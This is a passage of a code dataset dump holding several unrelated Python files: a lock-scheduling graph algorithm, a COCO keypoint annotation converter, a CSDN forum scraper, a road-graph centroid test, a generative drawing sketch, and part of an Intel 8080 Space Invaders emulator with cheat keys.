block_lenght))\n            block2_bl = block_bl(a_ship, A[b_poss], block2[-1])\n            # print(str(a_poss + 1) + \"_top, \" + str(b_poss + 1) + \"_\" + str(block2_bl)+ \", \" + str(block2_cost(a_ship, a_poss, A[b_poss], block2[-1])))\n            g.add_edge(str(a_poss + 1) + \"_top\", str(b_poss + 1) + \"_\" + str(block2_bl), weight=block2_cost(a_ship, a_poss, A[b_poss], block2[-1]))\n\n\ndef block1_cost(a_ship, a_poss, b_ship):\n    cost = 0\n    all_ships = A.copy()\n    del all_ships[0: a_poss + 1]\n    t_a = a_ship.arrival_time\n    t_b = b_ship.arrival_time\n\n    if all_ships:\n        for a in all_ships:\n            if a_ship.arrival_position == a.arrival_position:\n\n                interval_start = t_a\n                interval_end = t_b + T\n\n                if interval_start < a.arrival_time <= interval_end:\n                    cost += interval_end - a.arrival_time\n\n            else:\n                interval_start = t_a + T\n                interval_end = t_b\n\n                if interval_start < a.arrival_time <= interval_end:\n                    cost += interval_end - a.arrival_time\n\n    return cost\n\n\n# Add edges for block1\n# from a_k, where k = {0, ..., n} to b_l\ndef block1_add_edge(g, poss, b_l, cost, a_ship, b_ship):\n    for i in range(len(A) + 1):\n        # the cost of block1 edges does change, every edge has a different cost, but because of how _k is chosen,\n        # i.e. it is the number of waiting ships,\n        # the change in cost will not affect the total waiting time because the shortest path\n        # will only be able to leave by the right edge,\n        # right with respect to the total waiting time\n        cost2 = i * (b_ship.arrival_time - a_ship.arrival_time - T)\n        print(\"BLOCK 1: \" + str(poss + 1) + \"_\" + str(i) + \", \" + b_l + \", \" + str(cost + cost2))\n        g.add_edge(str(poss + 1) + \"_\" + str(i), b_l, weight=cost + cost2)\n\n\ndef create_edges_leaving_s(g, a):\n    s_ak_edge = str(a + 1) + '_' + str(find_ak_for_s(A[a]))\n    cost_leaving_s = calc_cost_leaving_s(A[a])\n    g.add_edge('s', s_ak_edge, weight=cost_leaving_s)\n\n\ndef create_0_cost_edges(g, a, k, a_top):\n    a_k = str(a + 1) + '_' + str(k)\n    g.add_edge(a_k, a_top, weight=0)\n\n\ndef create_edges_entering_t(g, a, a_top):\n    cost_entering_t = calc_cost_enter_t(A[a], a)\n    # print(a_top + ' -- > t cost = ' + str(cost_entering_t))\n    g.add_edge(a_top, 't', weight=cost_entering_t)\n\n\ndef lockmaster():\n    # print(\"\\nLockmaster - Polynomial time algorithm\")\n\n    g = nx.DiGraph() # Create acyclic graph g\n    g.add_node('s')\n    g.add_node('t')\n\n    blocks1 = [] # List of blocks. 
Each block is a tuple (start, end, block_lenght)\n blocks2 = []\n\n for a in range(len(A)):\n\n a_top = str(a + 1) + '_top'\n\n # Creating edges entering node t\n create_edges_entering_t(g, a, a_top)\n\n # Creating edges leaving node s\n create_edges_leaving_s(g, a)\n\n for k in range(len(A) + 1):\n\n # Creating 0-cost edges\n create_0_cost_edges(g, a, k, a_top)\n\n # Creating block1 and block2 edges\n if k > len(A) - 1:\n continue\n else:\n create_blocks(A[a], a, k, blocks1, blocks2, g)\n\n # Find shortest path\n # dijkstra's complexity - O( V^2 )\n # V = ( n * (n + 2) + 2) -- #rows * #columns + nodes s and t\n paths = nx.all_shortest_paths(g, source='s', target='t', method='dijkstra', weight='weight')\n path_lenght = nx.shortest_path_length(g, source='s', target='t', weight='weight')\n\n with open(\"..\\..\\\\visualisation\\lockmasterApp\\data\\shortestPaths.txt\", \"w\") as f:\n f.truncate(0)\n f.write(str(path_lenght) + \"\\n\")\n for p in paths:\n sp.append(p)\n f.write(str(p) + '\\n')\n # print('shortest s --> t path ' + str(p) + ' with cost = ' + str(path_lenght))\n f.write(str(blocks2))\n\n####################################################################################################\n####################################################################################################\n####################################################################################################\n","sub_path":"LockMaster/lockmaster/scheduling_parallel_batching_machines.py","file_name":"scheduling_parallel_batching_machines.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"35124458","text":"import json\nimport re\nimport fnmatch\nfrom PIL import Image\nfrom pylab import *\nimport os\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\"\n由via标注的2个关键点转成coco格式3个关键点,visible为实际值,\n\"\"\"\n\nIMAGE_DIR = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/1\"\nANNOTATION_DIR = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/test.json\"\nsave_dir = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/test_result_json.json\"\n\nnum_keypoints = 3\n\n\nINFO = {\n \"description\": \"Keypoints Location of Pointer Dataset\",\n \"url\": \"https://yigaoyi.github.io/\",\n \"version\": \"1.0\",\n \"year\": 2019,\n \"contributor\": \"Kilox PerXeption Group\",\n \"date_created\": datetime.datetime.utcnow().isoformat(' ')\n}\n\nLICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\"\n }\n]\n\nCATEGORIES = [\n {\n 'id': 1,\n 'name': 'pointer',\n 'supercategory': 'pointer',\n 'keypoints': [\"start\", \"center\", \"tail\"],\n 'skeleton': [[1, 2], [2, 3]]\n }\n]\n\n\nclass FC:\n \"\"\"For a colorful print\n DO NOT CHANGE 'ROS', we need a uniform style in ROS\n \"\"\"\n HEADER = '\\033[1m\\033[95m[KiloX Pointer]: '\n OKBLUE = '\\033[1m\\033[94m[KiloX Pointer]: '\n OKGREEN = '\\033[1m\\033[92m[KiloX Pointer]: '\n WARN = '\\033[1m\\033[93m[KiloX Pointer]: '\n FAIL = '\\033[1m\\033[91m[KiloX Pointer]: '\n END = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n def __init__(self):\n pass\n\n\ndef filter_for_jpeg(root, files):\n \"\"\"filter jpg files in dictionary\n\n :param root:\n :param files:\n :return:\n \"\"\"\n file_types = ['*.jpeg', '*.jpg']\n file_types = 
r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef create_image_info(image_id, file_name, image_size,\n date_captured=datetime.datetime.utcnow().isoformat(' '),\n license_id=1, coco_url=\"\", flickr_url=\"\"):\n image_info = {\n \"id\": image_id,\n \"file_name\": file_name,\n \"width\": image_size[0],\n \"height\": image_size[1],\n \"date_captured\": date_captured,\n \"license\": license_id,\n \"coco_url\": coco_url,\n \"flickr_url\": flickr_url\n }\n\n return image_info\n\n\ndef create_annotation_info(annotation_id, image_id, category_info, binary_mask, keypoints, num_keypoints,\n image_size=None, tolerance=2, bounding_box=None, ):\n annotation_info = {\n \"id\": annotation_id,\n \"image_id\": image_id,\n \"category_id\": category_info[\"id\"],\n \"iscrowd\": 0,\n \"area\": 0,\n \"bbox\": bounding_box.tolist(),\n \"segmentation\": [],\n \"num_keypoints\": num_keypoints,\n \"keypoints\": keypoints\n }\n\n return annotation_info\n\n\ndef main():\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": []\n }\n count = 0\n for root, _, files in os.walk(IMAGE_DIR):\n image_files = filter_for_jpeg(root, files)\n # go through each image\n for image_filename in image_files:\n print(image_filename)\n image = Image.open(image_filename)\n index = image_filename.rfind('.')\n afdex = image_filename.rfind('/')\n image_id = int(image_filename[afdex + 1:index])\n image_id = \"%d\" % image_id\n image_id = int(image_id)\n image_info = create_image_info(\n image_id, os.path.basename(image_filename), image.size)\n coco_output[\"images\"].append(image_info)\n\n file_str = open(ANNOTATION_DIR)\n setting = json.load(file_str)\n get_obj = json.dumps(setting)\n info = re.findall(image_filename[afdex + 1:index] + r'.jpg+\\d+', get_obj)\n if not info:\n print(\"{} is not exit in annotations!\".format(image_filename))\n else:\n count = count + 1\n\n obj_str = json.dumps(setting[\"\".join(info)])\n\n a = int(\"\".join(re.findall(r\"\\\"x\\\"\\: (.+?)\\,\", obj_str)))\n b = int(\"\".join(re.findall(r\"\\\"y\\\"\\: (.+?)\\,\", obj_str)))\n try:\n c = int(\"\".join(re.findall(r\"\\\"width\\\"\\: (.+?)\\,\", obj_str)))\n d = int(\"\".join(re.findall(r\"\\\"height\\\"\\: (.+?)\\}\", obj_str)))\n except ValueError:\n c = int(\"\".join(re.findall(r\"\\\"width\\\"\\: (.+?)\\}\", obj_str)))\n d = int(\"\".join(re.findall(r\"\\\"height\\\"\\: (.+?)\\,\", obj_str)))\n bbox = [a, b, c, d]\n x = a + c\n y = c + d\n segmentation = [x, y, a, y, a, b, x, b, x, y]\n try:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)\n except ValueError:\n try:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\}\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\}\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)\n except ValueError:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)\n\n visible = re.findall(r\"\\\"visible\\\"\\: \\\"(.+?)\\\"\", obj_str)\n\n a = int(len(px)/2)\n 
for j in arange(a):\n if not len(visible) - len(px) == 1:\n print(FC.WARN + \"Label info is wrong!\" + FC.END)\n points = []\n for i in arange(2):\n if visible[i] == '0':\n points.append(0)\n points.append(0)\n points.append(0)\n else:\n points.append(int(px[i+2*j]))\n points.append(int(py[i+2*j]))\n points.append(int(visible[i+2*j]))\n points.insert(3, int((int(px[2*j])+int(px[1+2*j]))/2))\n points.insert(4, int((int(py[2*j])+int(py[1+2*j]))/2))\n points.insert(5, 2)\n print(points)\n annotation_info = {\n \"id\": count,\n \"image_id\": image_id,\n \"category_id\": 1,\n \"iscrowd\": 0,\n \"area\": c * d,\n \"bbox\": bbox,\n \"segmentation\": segmentation,\n \"num_keypoints\": num_keypoints,\n \"keypoints\": points\n }\n coco_output[\"annotations\"].append(annotation_info)\n\n with open('{}'.format(save_dir), 'w') as output_json_file:\n json.dump(coco_output, output_json_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"coco/3_keypoints_v1.py","file_name":"3_keypoints_v1.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"355837658","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/8 17:37\n# @Author : Olex\n# @File : threadpool_spider.py\n# @Software: PyCharm\n\n\"\"\"\n抓取\n解析\n存储\n\"\"\"\nimport re\nimport ast\nfrom urllib import parse\nfrom datetime import datetime\n\nimport requests\nfrom scrapy import Selector\n\nfrom csdn_spider.models import *\n\ndomain = \"https://bbs.csdn.net\"\nurl_list = []\n\n\ndef get_nodes_json():\n\t# 获取节点列表\n\tleft_menu_text = requests.get(domain + \"/dynamic_js/left_menu.js?csdn\").text\n\tnodes_str_match = re.search(\"forumNodes: (.*])\", left_menu_text)\n\tif nodes_str_match:\n\t\tnodes_str = nodes_str_match.group(1).replace(\"null\", \"None\")\n\t\tnodes_list = ast.literal_eval(nodes_str)\n\t\treturn nodes_list\n\treturn []\n\n\ndef process_nodes_list(nodes_list):\n\t# 提取出所有的url到urls_list\n\tfor item in nodes_list:\n\t\tif \"url\" in item and item[\"url\"]:\n\t\t\turl_list.append(item[\"url\"])\n\t\t\tif \"children\" in item:\n\t\t\t\tprocess_nodes_list(item[\"children\"])\n\n\ndef get_level1_urls(nodes_list):\n\t# 提取第一层的url\n\tlevel1_urls = []\n\tfor item in nodes_list:\n\t\tif \"url\" in item and item[\"url\"]:\n\t\t\tlevel1_urls.append(item[\"url\"])\n\treturn level1_urls\n\n\ndef get_last_urls():\n\t# 剔除第一层的url,得到最终需要的url\n\tnodes_list = get_nodes_json()\n\tprocess_nodes_list(nodes_list)\n\tlevel1_urls = get_level1_urls(nodes_list)\n\tlast_url = []\n\tfor url in url_list:\n\t\tif url not in level1_urls:\n\t\t\tlast_url.append(url)\n\tall_urls = []\n\tfor url in last_url:\n\t\tall_urls.append(parse.urljoin(domain, url))\n\t\tall_urls.append(parse.urljoin(domain, url + \"/recommend\"))\n\t\tall_urls.append(parse.urljoin(domain, url + \"/closed\"))\n\treturn all_urls\n\n\ndef parse_topic(topic_url):\n\t# 获取帖子详情及回复\n\tprint(\"解析帖子详情页: {}\".format(topic_url))\n\ttopic_id = topic_url.split('/')[-1]\n\tres_text = requests.get(topic_url).text\n\tsel = Selector(text=res_text)\n\tall_divs = sel.xpath(\"//div[starts-with(@id,'post-')]\")\n\n\ttopic_item = all_divs[0]\n\tcontent = topic_item.xpath(\".//div[@class='post_body post_body_min_h']\").extract()[0]\n\tpraised_nums = topic_item.xpath(\".//label[@class='red_praise digg']//em/text()\").extract()[0]\n\tjtl_str = topic_item.xpath(\".//div[@class='close_topic']/text()\").extract()[0]\n\tjtl = 0\n\t# 匹配百分数\n\tjtl_match = re.search('(100|[1-9]?\\d(\\.\\d\\d?\\d?)?)%$|0$', jtl_str, re.M)\n\tif 
jtl_match:\n\t\tjtl = float(jtl_match.group(1))\n\n\texisted_topics = Topic.select().where(Topic.id == topic_id)\n\tif existed_topics:\n\t\ttopic = existed_topics[0]\n\t\ttopic.content = content\n\t\ttopic.praised_nums = int(praised_nums)\n\t\ttopic.jtl = jtl\n\n\t\ttopic.save()\n\n\tfor answer_item in all_divs[1:]:\n\t\tauthor_info = answer_item.xpath(\".//div[@class='nick_name']//a[1]/@href\").extract()[0]\n\t\tauthor_id = author_info.split(\"/\")[-1]\n\t\tcreate_time_str = answer_item.xpath(\".//label[@class='date_time']/text()\").extract()[0]\n\t\tcreate_time = datetime.strptime(create_time_str, \"%Y-%m-%d %H:%M:%S\")\n\t\tanswer_content = answer_item.xpath(\".//div[@class='post_body post_body_min_h']\").extract()[0]\n\t\tanswer_praised_nums = answer_item.xpath(\".//label[@class='red_praise digg']//em/text()\").extract()[0]\n\n\t\tanswer_id = answer_item.xpath(\".//@data-post-id\").extract()[0]\n\n\t\tanswer = Answer()\n\n\t\tanswer.id = int(answer_id)\n\t\tanswer.topic_id = topic_id\n\t\tanswer.author = author_id\n\t\tanswer.create_time = create_time\n\t\tanswer.praised_nums = int(answer_praised_nums)\n\t\tanswer.content = answer_content\n\n\t\texisted_answer = Answer.select().where(Answer.id == answer_id)\n\t\tif existed_answer:\n\t\t\tanswer.save()\n\t\telse:\n\t\t\tanswer.save(force_insert=True)\n\n\tnext_page = sel.xpath(\"//a[@class='pageliststy next_page']/@href\").extract()\n\tif next_page:\n\t\tnext_url = parse.urljoin(domain, next_page[0])\n\t\texecutor.submit(parse_topic, next_url)\n\n\ndef parse_author(url):\n\tauthor_id = url.split(\"/\")[-1]\n\t# 获取用户的详情\n\tprint(\"解析用户的详情页: {}\".format(url))\n\n\theaders = {\n\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',\n\t}\n\tres_text = requests.get(url, headers=headers).text\n\tsel = Selector(text=res_text)\n\tauthor = Author()\n\tauthor.id = author_id\n\tall_li_strs = sel.xpath(\"//ul[@class='mod_my_t clearfix']/li/span/text()\").extract()\n\tclick_nums = all_li_strs[0]\n\toriginal_nums = all_li_strs[1]\n\tforward_nums = int(all_li_strs[2])\n\trate = int(all_li_strs[3])\n\tanswer_nums = int(all_li_strs[4])\n\tpraised_nums = int(all_li_strs[5])\n\n\tauthor.click_nums = click_nums\n\tauthor.original_nums = original_nums\n\tauthor.forward_nums = forward_nums\n\tauthor.rate = rate\n\tauthor.answer_nums = answer_nums\n\tauthor.praised_nums = praised_nums\n\n\tdesc = sel.xpath(\"//dd[@class='user_desc']/text()\").extract()\n\tif desc:\n\t\tauthor.desc = desc[0].strip()\n\tperson_b = sel.xpath(\"//dd[@class='person_b']/ul/li\")\n\tfor item in person_b:\n\t\titem_text = \"\".join(item.extract())\n\t\tif \"csdnc-m-add\" in item_text:\n\t\t\tlocation = item.xpath(\".//span/text()\").extract()[0].strip()\n\t\t\tauthor.location = location\n\t\telse:\n\t\t\tindustry = item.xpath(\".//span/text()\").extract()[0].strip()\n\t\t\tauthor.industry = industry\n\tname = sel.xpath(\"//h4[@class='username']/text()\").extract()[0]\n\tauthor.name = name.strip()\n\texisted_author = Author.select().where(Author.id == author_id)\n\tif existed_author:\n\t\tauthor.save()\n\telse:\n\t\tauthor.save(force_insert=True)\n\n\ndef parse_list(url):\n\t# 提取列表页数据\n\tprint(\"解析列表页: {}\".format(url))\n\tres_text = requests.get(url).text\n\tsel = Selector(text=res_text)\n\tall_trs = sel.xpath(\"//table[@class='forums_tab_table']//tbody//tr\")\n\tfor tr in all_trs:\n\t\tstatus = tr.xpath(\".//td[1]/span/text()\").extract()[0]\n\t\tscore = tr.xpath(\".//td[2]/em/text()\").extract()[0]\n\t\ttopic_url = parse.urljoin(domain, 
tr.xpath(\".//td[3]/a[contains(@class,'forums_title')]/@href\").extract()[0])\n\t\ttopic_id = int(topic_url.split(\"/\")[-1])\n\t\ttopic_title = tr.xpath(\".//td[3]/a[contains(@class,'forums_title')]/text()\").extract()[0]\n\t\tauthor_url = parse.urljoin(domain, tr.xpath(\".//td[4]/a/@href\").extract()[0])\n\t\tauthor_id = author_url.split(\"/\")[-1]\n\t\tcreate_time_str = tr.xpath(\".//td[4]/em/text()\").extract()[0]\n\t\tcreate_time = datetime.strptime(create_time_str, \"%Y-%m-%d %H:%M\")\n\t\tanswer_info = tr.xpath(\".//td[5]/span/text()\").extract()[0]\n\t\tanswer_nums = int(answer_info.split(\"/\")[0])\n\t\tclick_nums = int(answer_info.split(\"/\")[1])\n\t\tlast_time_str = tr.xpath(\".//td[6]/em/text()\").extract()[0]\n\t\tlast_time = datetime.strptime(last_time_str, \"%Y-%m-%d %H:%M\")\n\n\t\ttopic = Topic()\n\n\t\ttopic.id = topic_id\n\t\ttopic.title = topic_title\n\t\ttopic.author = author_id\n\t\ttopic.click_nums = click_nums\n\t\ttopic.answer_nums = answer_nums\n\t\ttopic.create_time = create_time\n\t\ttopic.last_answer_time = last_time\n\t\ttopic.score = score\n\t\ttopic.status = status\n\n\t\texisted_topic = Topic.select().where(Topic.id == topic.id)\n\t\tif existed_topic:\n\t\t\ttopic.save()\n\t\telse:\n\t\t\ttopic.save(force_insert=True)\n\n\t\texecutor.submit(parse_author, author_url)\n\t\texecutor.submit(parse_topic, topic_url)\n\n\tnext_page = sel.xpath(\"//a[@class=pageliststy next_page']/@href\").extract()\n\tif next_page:\n\t\tnext_url = parse.urljoin(domain, next_page[0])\n\t\texecutor.submit(parse_list, next_url)\n\n\nif __name__ == \"__main__\":\n\tfrom concurrent.futures import ThreadPoolExecutor\n\n\texecutor = ThreadPoolExecutor(max_workers=10)\n\n\tlast_urls = get_last_urls()\n\tfor url in last_urls:\n\t\texecutor.submit(parse_list, url)\n","sub_path":"threading_spider/threadpool_spider.py","file_name":"threadpool_spider.py","file_ext":"py","file_size_in_byte":7282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368719815","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nCreated in February 2017 in ComplexCity Lab\n\n@author: github.com/fpfaende\n\nwhat it does\nextract a graph from \n\nparameters\ngraph\n\nhow it works\n\nreturn\n\n\n'''\n\nimport sys\nsys.path.insert(0, '/Users/fabien/workspace/github/policosm')\n\nimport networkx as nx\nfrom shapely.geometry import Polygon, LineString\n\n\ndef getCentroidsFromRoadsGraph(graph):\n\tlines = []\n\tfor u,v in graph.edges():\n\t\tucoo = (graph.node[u]['longitude'], graph.node[u]['latitude'])\n\t\tvcoo = (graph.node[v]['longitude'], graph.node[v]['latitude'])\n\t\tline = LineString([ucoo,vcoo])\n\t\tx = line.centroid.x\n\t\ty = line.centroid.y\n\t\tlines.append((x,y))\n\treturn lines\n\n\ndef getCentroidFromRoadsGraph(graph):\n\tlines = getCentroidsFromRoadsGraph(graph)\n\tx=0\n\ty=0\n\tfor xc, yc in lines:\n\t\tx += xc\n\t\ty += yc\n\tx = x / float(len(lines))\n\ty = y / float(len(lines))\n\treturn (x,y)\n\nif __name__ == \"__main__\":\n\ttestGraph = nx.Graph()\n\ttestGraph.add_node(1,longitude=1.0, latitude=1.0)\n\ttestGraph.add_node(2,longitude=2.0, latitude=2.0)\n\ttestGraph.add_edge(1, 2,osmid=3,highway='residential',level=3, lanes=1, oneway=False)\n\tassert getCentroidFromRoadsGraph(testGraph) == (1.5,1.5)","sub_path":"tests/functions/testGetCentroidFromRoadsGraph.py","file_name":"testGetCentroidFromRoadsGraph.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"472239093","text":"size(600, 600)\n\nbackground_color = 0\nbase_color = 30\nrandom_color_variability = 100\nsparseness = 60\nframe_offset = 100\nmin_line_length = 50\nmax_line_length = 100\ndrawing_area_x = width - frame_offset\ndrawing_area_y = height - frame_offset\n\nbackground(background_color)\n\nfor x in range(frame_offset, drawing_area_x):\n for y in range(frame_offset, drawing_area_y):\n should_draw = int(random(0, sparseness)) == 0\n if should_draw:\n line_length = random(min_line_length, max_line_length)\n random_color = random(-random_color_variability, random_color_variability)\n stroke(base_color + random_color)\n line(x, y, min(x + line_length, drawing_area_x), min(y + line_length, drawing_area_y))\n \n# save(\"output.png\")\n","sub_path":"converging_box/converging_box.pyde","file_name":"converging_box.pyde","file_ext":"pyde","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311020056","text":"import os\nimport time\nimport ctypes\nimport struct\nimport pygame\nimport pickle\n\nimport cpu\nfrom cheats import SpaceInvadersCheatEngine\n\nMIN_WIDTH = 256\nMIN_HEIGHT = 224\n\n\nclass Emulator:\n \"\"\"\n Contains 8080 CPU and uses Pygame to display the VRAM\n\n Controls:\n 1. Press 'c' key to insert coin\n 2. Press '1' key to choose 1 player\n 3. Press '2' key to choose 2 players\n 4. Press arrow keys to move (either player)\n 5. Press 'Space' to shoot\n\n Cheats:\n 1. Press 'k' to kill all aliens\n 2. Press 's' to die\n 3. Press 'l' to add lives\n 4. Press 'x' to break score\n\n\n \"\"\"\n\n BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n RED = (255, 0, 0)\n GREEN = (0, 255, 0)\n ASPECT_RATIO = MIN_WIDTH / MIN_HEIGHT\n CAPTION_FORMAT = 'Py8080: {}'\n MEMORY_MAPS = {\n \"cpudiag\": [\n (0x0100, \"cpudiag\")\n ],\n\n \"space_invaders\": [\n (0x0000, \"invaders.h\"),\n (0x0800, \"invaders.g\"),\n (0x1000, \"invaders.f\"),\n (0x1800, \"invaders.e\")\n ],\n\n \"lunar_rescue\": [\n (0x0000, \"lrescue.1\"),\n (0x0800, \"lrescue.2\"),\n (0x1000, \"lrescue.3\"),\n (0x1800, \"lrescue.4\"),\n (0x4000, \"lrescue.5\"),\n (0x4800, \"lrescue.6\")\n ],\n\n \"balloon_bomber\": [\n (0x0000, \"tn01\"),\n (0x0800, \"tn02\"),\n (0x1000, \"tn03\"),\n (0x1800, \"tn04\"),\n (0x4000, \"tn05-1\")\n ]\n }\n\n def __init__(self, path=None, mapname=None, width=MIN_WIDTH):\n if path:\n self._cpu = cpu.CPU(path=path)\n self._cpu.init_instruction_table()\n self._cheats = SpaceInvadersCheatEngine(self._cpu.memory)\n elif mapname:\n self._cpu = cpu.CPU(rom=self._create_memory(mapname))\n self._cpu.init_instruction_table()\n self._cheats = SpaceInvadersCheatEngine(self._cpu.memory)\n else:\n # From save state\n self._cpu = None\n self._cheats = None\n\n self._path = path\n self._width = max(MIN_WIDTH, width)\n self._height = round(self._width / self.ASPECT_RATIO)\n self._scaled_width = self._width\n self._scaled_height = self._height\n self._window_width = self._height\n self._window_height = self._width\n self._px_array = None\n self._fps = 60\n\n def _create_memory(self, mapname):\n \"\"\"\n Concatenate files to correct locations in memory\n\n :return: Array of integers\n \"\"\"\n memory = []\n for t in self.MEMORY_MAPS[mapname]:\n while len(memory) < t[0]:\n memory.append(0)\n with open('rom/'+t[1], 'rb') as f:\n while True:\n byte = f.read(1)\n if not byte:\n break\n a, = struct.unpack('c', byte)\n memory.append(ord(a))\n return memory\n\n def _refresh(self):\n \"\"\"\n Update the pixel array\n\n :return:\n \"\"\"\n 
j_range = int(self._width * 0.125)\n k_range = j_range // 4\n\n for i in range(self._height):\n index = self._cpu.VRAM_ADDRESS + (i << 5)\n\n for j in range(j_range):\n if 23 < j < 28:\n on = self.RED\n elif 1 < j < 9 or (j < 2 and 24 < i < 136):\n on = self.GREEN\n else:\n on = self.WHITE\n vram = self._cpu.memory[index]\n index += 1\n for k in range(k_range):\n y = self._width - 1 - j*k_range - k\n\n if (vram & 0x01) == 1:\n self._px_array[i][y] = on\n else:\n self._px_array[i][y] = self.BLACK\n\n vram >>= 1\n\n def _play_audio(self):\n if self._cpu.io.out_port3 != self._last_port3:\n if self._repeating_sound and self._cpu.io.out_port3 & 0x1 and not (self._last_port3 & 0x1):\n pygame.mixer.music.play(-1)\n elif self._repeating_sound and not (self._cpu.io.out_port3 & 0x1) and self._last_port3 & 0x1:\n pygame.mixer.music.stop()\n if self._sounds[0] and self._cpu.io.out_port3 & 0x2 and not (self._last_port3 & 0x2):\n self._main_audio.play(self._sounds[0])\n if self._sounds[1] and self._cpu.io.out_port3 & 0x4 and not (self._last_port3 & 0x4):\n self._main_audio.play(self._sounds[1])\n if self._sounds[2] and self._cpu.io.out_port3 & 0x8 and not (self._last_port3 & 0x8):\n self._main_audio.play(self._sounds[2])\n self._last_port3 = self._cpu.io.out_port3\n\n if self._cpu.io.out_port5 != self._last_port5:\n if self._sounds[3] and self._cpu.io.out_port5 & 0x1 and not (self._last_port5 & 0x1):\n self._main_audio.play(self._sounds[3])\n if self._sounds[4] and self._cpu.io.out_port5 & 0x2 and not (self._last_port5 & 0x2):\n self._main_audio.play(self._sounds[4])\n if self._sounds[5] and self._cpu.io.out_port5 & 0x4 and not (self._last_port5 & 0x4):\n self._main_audio.play(self._sounds[5])\n if self._sounds[6] and self._cpu.io.out_port5 & 0x8 and not (self._last_port5 & 0x8):\n self._main_audio.play(self._sounds[6])\n if self._sounds[7] and self._cpu.io.out_port5 & 0x10 and not (self._last_port5 & 0x10):\n self._main_audio.play(self._sounds[7])\n self._last_port5 = self._cpu.io.out_port5\n\n def _handle(self, event):\n if event.type == pygame.QUIT:\n exit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_c:\n self._cpu.io.in_port1 |= 0x01\n if event.key == pygame.K_2:\n self._cpu.io.in_port1 |= 0x02\n if event.key == pygame.K_1:\n self._cpu.io.in_port1 |= 0x04\n if event.key == pygame.K_SPACE:\n self._cpu.io.in_port1 |= 0x10\n self._cpu.io.in_port2 |= 0x10\n if event.key == pygame.K_LEFT:\n self._cpu.io.in_port1 |= 0x20\n self._cpu.io.in_port2 |= 0x20\n if event.key == pygame.K_RIGHT:\n self._cpu.io.in_port1 |= 0x40\n self._cpu.io.in_port2 |= 0x40\n if event.key == pygame.K_6:\n # Save state\n self.save()\n if event.key == pygame.K_s:\n self._cheats.hack_kill_player()\n if event.key == pygame.K_k:\n self._cheats.hack_kill_mobs()\n if event.key == pygame.K_l:\n self._cheats.hack_add_lives()\n if event.key == pygame.K_x:\n self._cheats.hack_score()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_c:\n self._cpu.io.in_port1 &= 255 - 0x01\n if event.key == pygame.K_2:\n self._cpu.io.in_port1 &= 255 - 0x02\n if event.key == pygame.K_1:\n self._cpu.io.in_port1 &= 255 - 0x04\n if event.key == pygame.K_SPACE:\n self._cpu.io.in_port1 &= 255 - 0x10\n self._cpu.io.in_port2 &= 255 - 0x10\n if event.key == pygame.K_LEFT:\n self._cpu.io.in_port1 &= 255 - 0x20\n self._cpu.io.in_port2 &= 255 - 0x20\n if event.key == pygame.K_RIGHT:\n self._cpu.io.in_port1 &= 255 - 0x40\n self._cpu.io.in_port2 &= 255 - 0x40\n\n if event.type == pygame.VIDEORESIZE:\n self._window_width, 
self._window_height = event.w, event.h\n        if self._window_width < 224:\n            self._window_width = 224\n        if self._window_height < 256:\n            self._window_height = 256\n        self._scaled_width = self._window_height\n        self._scaled_height = self._window_width\n        if self._window_width/self._window_height > self._height/self._width:\n            self._scaled_height = int(\n                self._window_height * self._height/self._width)\n        if self._window_width/self._window_height < self._height/self._width:\n            self._scaled_width = int(\n                self._window_width * self._width/self._height)\n        self._window = pygame.display.set_mode(\n            (self._window_width, self._window_height), pygame.RESIZABLE)\n        self._scaled_surface = pygame.Surface(\n            (self._scaled_height, self._scaled_width))\n\n    def save(self):\n        \"\"\"\n        Save CPU state to disk\n\n        :return:\n        \"\"\"\n\n        timestamp = round(time.time())\n        state_path = 'saves/{}_{}.pickle'.format(self._path, timestamp)\n        with 